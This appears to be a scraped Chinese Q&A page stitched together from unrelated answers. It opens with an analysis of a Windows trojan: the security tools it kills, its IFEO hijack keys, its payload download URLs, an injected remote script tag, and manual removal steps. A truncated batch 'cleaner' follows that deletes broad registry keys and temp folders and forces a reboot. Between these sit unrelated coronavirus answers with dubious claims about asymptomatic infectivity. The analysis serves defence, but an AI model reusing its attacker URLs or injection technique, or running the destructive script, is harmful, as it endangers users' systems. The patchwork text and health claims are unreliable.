A. 是不是最新的病毒只要搜索“杀毒,木马,瑞星,江民……”等关键字IE就会自动关闭
最近发现很多人出现了打不开sha软件 反病 毒工具 甚至带有病 毒字样的窗口 今天就接到了这样的一个样本 先前
这是一个可以说结合了几乎所有病 毒的特征的病毒 除了感染文件之外 可以说是比熊猫有过之而无不及!
病毒特征:
1.破坏安全模式
2.结束常见杀毒软件以及反病毒工具进程
3.监控窗口
4.关闭自动更新以及Windows安全中心
5.屏蔽显示隐藏文件
6.下载木马
7.IFEO映像劫持
8.GHOST文件引导破坏
9.各盘符均有引导启动关联文件,即便你重装系统盘也照样发作
分析报告
File: 1201AEC1.exe
Size: 36435 bytes
MD5:
SHA1:
CRC32: 27CA1195
加壳方式:UPX
病毒运行后
在C:\Program Files\Common Files\Microsoft Shared\MSInfo\下面释放一个同样由8个数字和字母组成的组合的文
件名的dll 和一个同名的dat 文件
我这里是C:\Program Files\Common Files\Microsoft Shared\MSInfo\41115BDD.dll
这个随机的数字应该与机器码有关
该dll插入Explorer进程 Timplatform以及ctfmon进程
监视并关闭以下进程以及窗口
AntiVirus
TrojanFirewall
Kaspersky
JiangMin
KV200
kxp
Rising
RAV
RFW
KAV200
KAV6
McAfe
Network Associates
TrustPort
NortonSymantec
SYMANT~1
Norton SystemWorks
ESET
Grisoft
F-Pro
Alwil Software
ALWILS~1
F-Secure
ArcaBit
Softwin
ClamWin
DrWe
Fortineanda Software
Vba3
Trend Micro
QUICKH~1
TRENDM~1
Quick Heal
eSafewido
Prevx1
ers
avg
Ikarus
SophoSunbeltPC-cilli
ZoneAlar
Agnitum
WinAntiVirus
AhnLab
Normasurfsecret
Bullguard\Blac
360safe
SkyNet
Micropoint
Iparmor
ftc
mmjk2007
Antiy Labs
LinDirMicro Lab
Filseclab
ast
System Safety Monitor
ProcessGuard
FengYun
Lavasoft
NOD3
mmsk
The Cleaner
Defendio
kis6Beheadsreng
IceSword
HijackThis
killbox
procexp
Magicset
EQSysSecureProSecurity
Yahoo!
Google
P4P
Sogou PXP
ardsys
超级兔子木马
KSysFiltsys
KSysCallsys
AVK
K7
Zondex
blcorp
Tiny Firewall Pro
Jetico
HAURI
CA
kmx
PCClear_Plus
Novatix
Ashampoo
WinPatrol
Spy Cleaner Gold
CounterSpy
EagleEyeOS
Webroot
BufferZ
avp
AgentSvr
CCenter
Rav
RavMonD
RavStub
RavTask
rfwcfg
rfwsrv
RsAgent
Rsaupd
runiep
SmartUp
FileDsty
RegClean
360tray
360Safe
360rpt
kabaload
safelive
Ras
KASMain
KASTask
KAV32
KAVDX
KAVStart
KISLnchr
KMailMon
KMFilter
KPFW32
KPFW32X
KPFWSvc
KWatch9x
KWatch
KWatchX
TrojanDetector
UpLive.EXE
KVSrvXP
KvDetect
KRegEx
kvol
kvolself
kvupload
kvwsc
UIHost
IceSword
iparmo
mmsk
adam
MagicSet
PFWLiveUpdate
SREng
WoptiClean
scan32
hcfg32
mcconsol
HijackThis
mmqczj
Trojanwall
FTCleanerShell
loaddll
rfwProxy
KsLoader
KvfwMcl
autoruns
AppSvc32
ccSvcHst
isPwdSvc
symlcsvcnod32kui
avgrssvc
RfwMain
KAVPFW
Iparmor
nod32krn
PFW
RavMon
KAVSetup
NAVSetup
SysSafe
QHSET
zxsweep.
AvMonitor
UmxCfg
UmxFwHlp
UmxPol
UmxAgent
UmxAttachment
KPFW32
KPFW32X
KvXP_1
KVMonXP_1
KvReport
KVScan
KVStub
KvXP
KVMonXP
KVCenter
TrojDie
avp.com.
krepair.COM
KaScrScn.SCR
Trojan
Virus
kaspersky
jiangmin
rising
ikaka
ba
kingsoft
360safe
木马
木马
病毒
sha
sha
查 毒
防 毒
反 病 毒
专杀
专杀
卡 巴 斯 基
江 民
瑞 星
卡卡社区
金 山 毒 霸
毒霸
金 山 社 区
3 6 0 安全
恶 意 软 件
流 氓 软 件
举 报
报 警
杀 软
杀 软
防 骇
在C:\WINDOWS\Help\下面生成一个同样由8个数字和字母组成的组合的文件名的chm文件
在C:\WINDOWS\下面生成一个同样由8个数字和字母组成的组合的文件名的hlp文件
删除C:\WINDOWS\system32\verclsid.exe
将其重命名为verclsid.exe.bak
释放41115BDD.exe(随机8位)和autorun.inf到除系统分区外的其他分区
注册表相关操作
删除
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
破坏安全模式
修改
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue值
为0x00000000
HKU\S-1-5-21-1085031214-1078145449-839522115-500
\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden为0x00000002
HKU\S-1-5-21-1085031214-1078145449-839522115-500
\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden为0x00000001
屏蔽显示隐藏文件
修改常见杀毒软件服务的start键值为0x00000004
如HKLM\SYSTEM\ControlSet001\Services\RfwService\Start: 0x00000004
修改HKLM\SYSTEM\CurrentControlSet\Services\wuauserv\Start
和HKLM\SYSTEM\CurrentControlSet\Services\wscsvc\start键值为0x00000004
关闭自动更新
添加IFEO映像劫持项( 我的意见是用Autoruns删除映像劫持)
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adam.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AgentSvr.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AppSvc32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrssvc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AvMonitor.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccSvcHst.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FileDsty.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FTCleanerShell.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iparmo.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Iparmor.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\isPwdSvc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kabaload.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KaScrScn.SCR
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASMain.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASTask.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAV32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVDX.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVPFW.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVSetup.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVStart.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KISLnchr.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMailMon.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMFilter.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32X.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFWSvc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRegEx.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\krepair.COM
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KsLoader.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVCenter.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvDetect.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvfwMcl.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP_1.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvol.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvolself.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvReport.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVScan.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVSrvXP.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVStub.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvupload.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvwsc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP_1.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch9x.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatchX.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\loaddll.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MagicSet.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcconsol.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmqczj.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmsk.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVSetup.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32krn.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32kui.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFW.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWLiveUpdate.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHSET.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMonD.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavStub.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavTask.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegClean.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwcfg.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RfwMain.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwProxy.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwsrv.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RsAgent.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rsaupd.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiep.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\safelive.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scan32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\shcfg32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SmartUp.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SREng.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\symlcsvc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SysSafe.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojanDetector.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Trojanwall.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojDie.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UIHost.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAgent.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAttachment.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxCfg.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxFwHlp.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxPol.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UpLive.EXE.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WoptiClean.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zxsweep.exe
被劫持到C:\Program Files\Common Files\Microsoft Shared\MSInfo\下面的那个dat文件
下载dl1.exe到临时文件夹
首先下载http://google.xxxx38.org/update/down.txt看病毒是否需要更新
然后分别下载http://google.xxxx38.org/update/wow.exe
http://google.xxxx38.org/update/mh.exe
http://google.xxxx38.org/update/wm.exe
http://google.xxxx38.org/update/my.exe
http://google.xxxx38.org/update/wl.exe
http://google.xxxx38.org/update/zt.exe
http://google.xxxx38.org/update/jh.exe
http://google.xxxx38.org/update/tl.exe
http://google.xxxx38.org/update/1.exe
http://google.xxxx38.org/update/2.exe 到program files 文件夹 并把他们命名为ycnt1.exe~ycnt10.exe
具体每个文件的生成物就不一一列举了
不过值得一提的是ycnt9.exe这个木马
他生成C:\WINDOWS\system32\win1ogo.exe
并且该木马试图向局域网内所有用户的80端口每隔5000ms进行arp欺骗
插入<script language=javascript src=http://google.171738.org/ad2.js></script>代码
也就是局域网内所有用户在打开网页时都会被插入这段代码
所有木马文件植入完毕后 生成物如下
C:\WINDOWS\system32\drivers\npf.sys
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\msdebug.dll
C:\WINDOWS\system32\nwiztlbu.exe
C:\WINDOWS\system32\Packet.dll
C:\WINDOWS\system32\RemoteDbg.dll
C:\WINDOWS\system32\testdll.dll
C:\WINDOWS\system32\WanPacket.dll
C:\WINDOWS\system32\win1ogo.exe
C:\WINDOWS\system32\windds32.dll
C:\WINDOWS\system32\winpcap.exe
C:\WINDOWS\system32\wpcap.dll
C:\WINDOWS\system32\xpdhcp.dll
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\testexe.exe
C:\Program Files\Common Files\cssrs.exe
sreng日志反映如下(在处理一些东西后扫描的这里提前列出)
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<testrun><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\testexe.exe> []
<Kvsc><C:\WINDOWS\Kvsc3.exe> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
<{15BD4111-4111-5BDD-115B-111BD1115BDD}><C:\Program Files\Common Files\Microsoft
Shared\MSINFO\41115BDD.dll> []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
<Userinit><C:\WINDOWS\system32\userinit.exe,C:\Program Files\Common Files\cssrs.exe,> [N/A]
[PID: 1400][C:\WINDOWS\Explorer.EXE] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-
2158)]
[C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\testdll.dll] [N/A, ]
[C:\WINDOWS\system32\Kvsc3.dll] [N/A, ]
解决办法如下:
1.确定那个8位随机数的dll的名称
这里我们选用winrar确定那个dll的名称
方法是:打开winrar.exe
工具 查看
在上面的地址栏中 进入c:\program files\common files\microsoft shared\msinfo目录
我这台被感染的电脑的文件名为41115bdd.dll
2.使用强制删除工具删除那个dll文件
这里我们选用Xdelbox1.2这个软件
XDelBox1.2(Dos级别灭杀工具):
1、dos级文件删除方式,打造病毒清除新模式
2、无须进入安全模式,即可删除所有病毒文件
3、支持一次重启批量删除多个文件
4、复制路径的删除添加方式更适用于网络求助(支持拖曳)
注意:删除时复制所有要删除文件的路径,在待删除文件列表里点击右键选择从剪贴板导入。导入后在要删除文件上点击右键,选择立刻重启删除,电脑会重启进入DOS界面进行删除操作,删除完成后会自动重启进入你安装的操作系统。操作前注意保存电脑中正在打开的文档。有关XDelBox的详细说明请看xdelbox1.2目录下help.chm
重起机器后
3.恢复被映像劫持的软件
这里我们使用autoruns这个软件 由于这个软件也被映像劫持了 所以我们随便把他改个名字
打开这个软件后 找到Image hijack (映像劫持)
删除除了Your Image File Name Here without a pathSymbolic Debugger for Windows 2000Microsoft Corporationc:\windows\system32\ntsd.exe
以外的所有项目
4.此时我们就可以打开sreng了 呵呵
打开sreng
系统修复 高级修复 点击修复安全模式 在弹出的对话框中点击是
5.恢复显示隐藏文件
把下面的 代码拷入记事本中然后另存为1.reg文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"
双击1.reg把这个注册表项导入
好了 此时病毒对于我们的所有限制已经解除了
6.清除其下载的木马了
重起机器 进入安全模式
双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹"
清除"隐藏受保护的操作系统文件
用WINRAR打开 然后查看以下路径,将发现的名字都删(里面是病毒下载下来的木马)
C:\Documents and Settings\Administrator\Local Settings\Temp\testexe.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\testexe.dll
C:\Documents and Settings\Administrator\Local Settings\Temp\dl1.exe
C:\Program Files\Common Files\Microsoft Shared\MSInfo\41115BDD.dat(随机8位数字字母组合)
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\testexe.exe
C:\WINDOWS\Help\41115BDD.chm(随机8位数字字母组合)
C:\WINDOWS\system32\DirectX\DirectX.ini
C:\WINDOWS\system32\drivers\npf.sys
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\msdebug.dll
C:\WINDOWS\system32\nwiztlbu.exe
C:\WINDOWS\system32\Packet.dll
C:\WINDOWS\system32\RemoteDbg.dll
C:\WINDOWS\system32\testdll.dll
C:\WINDOWS\system32\WanPacket.dll
C:\WINDOWS\system32\win1ogo.exe
C:\WINDOWS\system32\windds32.dll
C:\WINDOWS\system32\winpcap.exe
C:\WINDOWS\system32\wpcap.dll
C:\WINDOWS\system32\xpdhcp.dll
C:\WINDOWS\41115BDD.hlp(随机8位数字字母组合)
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\testexe.exe
C:\Program Files\Common Files\cssrs.exe
C:\Program files\ycnt1.exe~ycnt10.exe(如果有的话)
最后别忘了
7.还是用winrar 删除各个分区下面的autorun.inf和 41115BDD.exe(随机8位数字字母组合)
一定不要双击 最好的方法是用winrar看
8.装杀毒软件 保护好你的电脑
到此为止,病毒已经完全清除。。。
附带本次所有软件(连接绝不丢失):
xdelbox1.2
http://www.hltsoft.cn/download/soft/safetools1/xdelbox1.2.RAR
SREng
http://www.hltsoft.cn/download/soft/safetools1/SREng.rar
Autoruns
http://www.hltsoft.cn/download/soft/safetools1/Autoruns861-YYZ.rar
转贴请注明(风月阁) 来自:http://kairizero.blog.sohu.com/
B. 查出病毒文件如下,请问这些都是纯病毒么,要怎么处理删除会不会影响系统正常运行
卡巴斯基6.0 官方下载地址:
http://www.kaspersky.com.cn/KL-Downloads/KL-Proct6.0.htm
这是国际上最好用的杀毒软件,建议先重装或恢复系统后进行杀毒,否则这些病毒容易使你电脑过慢,导致杀毒过程很漫长~
C. 冠状病毒和SARS有怎样的关系
新冠状病毒不是非典,但是症状类似。中国疾控中心指出,虽然此次新型冠状病毒不是SARS,但冠状病毒可引起一系列症状。目前的两例实验室确诊病例均表现为严重呼吸道感染症状,严重程度类似SARS(非典)。
中国疾控中心指出,SARS也是由一种冠状病毒引起,此次病毒非SARS,但冠状病毒可引起一系列症状,既可导致症状轻微的普通感冒,也可能引起严重的呼吸系统疾病。目前的两例确诊病例均表现为严重呼吸道感染症状,严重程度类似SARS(非典)。
新冠状病毒的人际传播能力跟SARS有相应的地方,就是平均一个病人能够传染2到3个人,这是它的传播能力。另外还有一个重要指标是这个病的倍增时间相对来说比SARS要短,SARS是9天左右的时间会倍增。
新型冠状病毒大概6、7天的时间病例就会翻倍。它的一个衡量指标传代间隔,新型冠状病毒相对比较短,所以使得病例增长速度也相对比较快。
(3)hku1病毒扩展阅读:
这一病毒和引起非典的冠状病毒不同,并不能和SARS划等号。目前在英国确诊的患者病情很重,很多方面比较类似于SARS。就我们判断,疾病的严重程度、传播方式很相近,比较类似,不能说完全等同,主要是它的结构是不是完全一样,传播类型是不是完全一样。
D. 浙江舟山口岸首次检出人类冠状病毒HKU1是怎么回事
据报道,浙江舟山出入境检验检疫局表示,近日该局在对一艘马耳他籍油轮进行疫情排查时,在一名格鲁吉亚籍船员呼吸道样本中检出了人类冠状病毒HKU1,这是浙江口岸首次检出该类型冠状病毒。
目前,经过治疗,该船员身体状况已经明显好转。
专家表示人类冠状病毒HKU1主要引起细支气管炎或肺炎,在人群中的感染率约为0.3%~4.4%之间。对于婴幼儿、老年人和免疫力低下的人群,其能引起更为严重的呼吸道疾病。
E. 新冠无症状感染者同样具有传染性,他的传染性有多强
无症状的感染者的传染性是比较弱的,他们自身抵抗力比较强,某些患者身上存在这个病毒的抗体。相比于确诊病例的患者传染性要弱很多。
目前这个病毒已经接近快尾声了,但是大家依然不能放松,还是要时刻保持警惕,以防自己身边存在那些无症状感染者,随时带好口罩,勤洗手。
F. 病毒阿!病毒~ 谁知道这些病毒文件是什么
找到路径将其删除,但HKU\S-1-5-21-1390067357-1580436667-682003330-1003\Software\GameSpy多数为注册表项被感染了。
G. 很奇怪的病毒
把我下面的代码复制下来,另存为.bat为后缀的文件,也就是批处理文件啦,然后双击运行就可以了.如果不行的话,请在我的网络空间里留言.另外请在杀毒重启时把U盘那些移动存储设备拔掉.
@echo off
title 忆林子
color 0a
echo ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
echo.
echo 该病毒资料
echo.
echo 该病毒建立的包括的源文件如下:
echo.
echo 病毒文件全路径 大小(字节)
echo c:\WINDOWS\system32\54D427F8.EXE(这个数字是病毒随机生成的) 20,284
echo c:\WINDOWS\system32\A0A29414.DLL(这个数字是病毒随机生成的) 13,812
echo 其它所有分区:\autorun.inf 78
echo 其它所有分区:\auto.exe 20,284 20,284
echo.
echo 其中autorun.inf文件里的内容
echo.
echo [AutoRun]
echo open=auto.exe
echo shellexecute=auto.exe
echo shell\Auto\command=auto.exe
echo.
echo 注意:因为该病毒与系统进程绑定在一起,所以在杀毒时你的计算机将会被强制重启
echo 重启之后,请再运行一次本程序,该病毒方可清除完毕。
echo 请把该程序放在桌面上执行,并且在重启之后马上再次运行该程序。
echo.
echo ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
echo.
set /p tmp=以上是该病毒的信息,如果要清除该病毒,请回车键开始杀毒...
if not exist c:\tmp1.忆林子 (
reg query HKLM\SYSTEM\CurrentControlSet\Services\CF9EDF4C /v ImagePath >>c:\tmp1.忆林子
)
if not exist c:\tmp2.忆林子 (
reg query HKLM\SYSTEM\CurrentControlSet\Services\CF9EDF4C /v Description >>c:\tmp2.忆林子
)
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v isFirstRun>>tmp.忆林子
for /f "tokens=1,2,3 skip=4 delims= " %%j in ('more tmp.忆林子') do set isFirstRun=%%l
if exist tmp.忆林子 del tmp.忆林子 /q
if /i "%isFirstRun%"=="1" goto :secondStep
net stop cf9edf4c>nul
for /L %%c in (1,1,10) do (
sc delete cf9edf4c>nul
)
rem 删除由病毒新建的项
reg delete "HKCU\SYSTEM" /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT" /v ReportBootOk /f
reg delete "HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_CF9EDF4C" /f
reg delete "HKLM\SYSTEM\ControlSet001\Services\CF9EDF4C" /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CF9EDF4C" /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\CF9EDF4C" /f
reg delete "HKU\.DEFAULT\SYSTEM" /f
reg delete "HKU\S-1-5-18\SYSTEM" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v isFirstRun /d 1 /f
shutdown -r -t 0
exit
:secondStep
for /f "tokens=1,2,3 skip=1 delims= " %%j in ('more c:\tmp1.忆林子') do set test=%%l
set fileName1=%test:~-12%
echo %fileName1%
for /f "tokens=1,2,3 skip=1 delims= " %%j in ('more c:\tmp2.忆林子') do set fileName2=%%l.dll
echo %fileName2%
for %%d in (%fileName1%,%fileName2%) do (
taskkill /im %%d /f>nul
taskkill /fi "moles eq %%d" /f>nul
)
if exist c:\temp1.忆林子 del c:\temp1.忆林子 /q
if exist c:\temp2.忆林子 del c:\temp2.忆林子 /q
for %%d in (%fileName1%,%fileName2%) do (
if exist "%systemroot%\system32\%%d" (
attrib -s -h -r "%systemroot%\system32\%%d"
del "%systemroot%\system32\%%d" /q
)
)
del c:\WINDOWS\Prefetch\*.* /q
rd "%userprofile%\Local Settings\temp" /s /q
rem 添加病毒删除的项
echo Windows Registry Editor Version 5.00>>tmp.忆林子.reg
echo.>>tmp.忆林子.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ERSvc]>>tmp.忆林子.reg
echo "DependOnService"=hex(7):52,00,70,00,63,00,53,00,73,00,00,00,00,00>>tmp.忆林子.reg
echo "Description"="服务和应用程序在非标准环境下运行时允许错误报告。">>tmp.忆林子.reg
echo "DisplayName"="Error Reporting Service">>tmp.忆林子.reg
echo "ErrorControl"=dword:00000000>>tmp.忆林子.reg
echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\>>tmp.忆林子.reg
echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\>>tmp.忆林子.reg
echo 00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\>>tmp.忆林子.reg
